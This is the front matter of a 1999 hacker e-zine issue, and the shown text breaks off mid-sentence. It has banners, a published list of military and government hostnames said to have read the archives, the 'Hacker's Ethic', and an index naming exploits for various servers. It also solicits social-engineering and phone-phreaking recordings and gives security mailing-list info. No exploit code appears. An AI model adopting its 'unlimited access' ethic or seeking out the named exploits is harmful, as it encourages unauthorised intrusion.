[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 42 Volume 1 1999 *Nov 14th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== * This issue covers Nov 7th to Nov 14th and is our 1st anniversary edition! ========================================================================== (¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) (¯`·._(¯`·._( © BIRTHDAY ISSUE NOV13th 1999 © )_.·´¯)_.·´¯) (¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) _ _ / |___| |_ | / __| __| _ | \__ \ |_ __ _ _ __ _ __ (_)_ |_|___/\__|_ ___ __ _ _ __ _ _ / _` | '_ \| '_ \| \ \ / / _ \ '__/ __|/ _` | '__| | | | | (_| | | | | | | | |\ V / __/ | \__ \ (_| | | | |_| | \__,_|_| |_|_| |_|_| \_/ \___|_| |___/\__,_|_| \__, | ___ __| (_) |_(_) ___ _ __ |___/ / _ \/ _` | | __| |/ _ \| '_ \ | __/ (_| | | |_| | (_) | | | | \___|\__,_|_|\__|_|\___/|_| |_| "ABUSUS NON TOLLIT USUM" ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good to see our boys keeping up with the news... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! http://www.csoft.net/~hwa =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #42 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ************************************************************************** ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Eris Free Net #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on from the zine and around *** *** the zine or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= (¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) (¯`·._(¯`·._( © BIRTHDAY ISSUE NOV13th 1999 © )_.·´¯)_.·´¯) (¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) The first video played on MTV was 'Video Killed The Radio Star' _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Who is Chris Buckley and why was he busted?...................... 04.0 .. rpc.nfsd2 exploit for Linux ..................................... 05.0 .. MSADC/RDS script v2 by rain forest puppy......................... 06.0 .. CMAIL Server 2.3 SP2 Exploit for Windows98/Penguin Security...... 07.0 .. FuseMail Version 2.7 Exploit for Windows98/Shadow Penguin Security 08.0 .. NetcPlus SmartServer3 Exploit for Windows98/Shadow Penguin Security 09.0 .. FTP Serv-U Version 2.5 Exploit for Windows98/Shadow Penguin Security 10.0 .. Tiny FTPD Version 0.51 Exploit for Windows98/Shadow Penguin Security 11.0 .. ZOM-MAIL 1.09 Exploit/Shadow Penguin Security.................... 12.0 .. AL-Mail32 Version 1.10 Exploit for Windows98/Shadow Penguin Security 13.0 .. YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit.......... 14.0 .. Skyfull Mail Server Version 1.1.4 Exploit/Shadow Penguin Security. 15.0 .. Exploit Translation Server Version1.00/Shadow Penguin Security... 16.0 .. Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) 17.0 .. Security Focus Newsletters #14 and 15............................ 18.0 .. First RealJukebox Now RealPlayer ................................ 19.0 .. New Difficult To Kill Macro Virus Found ......................... 20.0 .. Do the Laws of War Apply in Cyberspace? ......................... 21.0 .. cDc Has New Trojan Plans ........................................ 22.0 .. India Set To Vote on 'CyberLaw' Bill ............................ 23.0 .. Public Workshop to Discuss Web Site Profiling To Be Held ........ 24.0 .. Naval Station Upgrades Web Security ............................. 25.0 .. Sony Reveals Addresses of 2.5 Million Subscribers ............... 26.0 .. TrustE to Rethink Charter ....................................... 27.0 .. Russians Exploited SIPRnet Gateways ............................. 28.0 .. FBI Director Calls For International Cooperation on Online Crime 29.0 .. Lebanon Outlaws Voice Over IP ................................... 30.0 .. Bond Fans Could Not Wait?........................................ 31.0 .. Masquerade Attack Discovered for Outlook ........................ 32.0 .. Feds May Create Database to Steal Privacy ....................... 33.0 .. CMU Invades Students Computers .................................. 34.0 .. New Privacy Alerting Software ................................... 35.0 .. CypherPunks to Host Echelon Discussion .......................... 36.0 .. Cable And Wireless Optus Drops Legal Action Against Surfers ..... 37.0 .. BubbleBoy Virus Uses HTML ....................................... 38.0 .. DVD Decrypters Sued - DeCSS Labeled A 'Good Thing'............... 39.0 .. Class Action Suits Brought Against RealNetworks ................. 40.0 .. IETF Rejects Internet Wiretapping Proposals ..................... 41.0 .. John Vranesevich, AntiOnline, Slashdot and the Synthesis ........ 42.0 .. Strange Corporate Hacking Saga .................................. 43.0 .. Bubbleboy breaks out of lab - found on net ...................... 44.0 .. 'Fun Love' Warning Issued ....................................... 45.0 .. Simple nomad to speak at toorcon................................. 46.0 .. Distributed Attempt to Break 56bit CS-Cipher .................... 47.0 .. CallNet Admits to Security Blunder .............................. 48.0 .. Singapore Pair Sentenced After Posting Passwords ................ 49.0 .. Singapore Agencies to Investigate Defacement of Government Web Site 50.0 .. BSA Targets IRC For Piracy ...................................... 51.0 .. Law Firm Sued Over Possible Cyber Attack ........................ 52.0 .. New E-Zine Issues Released ...................................... 53.0 .. 'Fixed' version of the new ADM-BIND exploit...................... 54.0 .. Current snapshot of the CYBERARMY lists. Proxies, etc............ During an average lifetime a man will spend 3550 hours removing 8.4 meters of stubble =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a 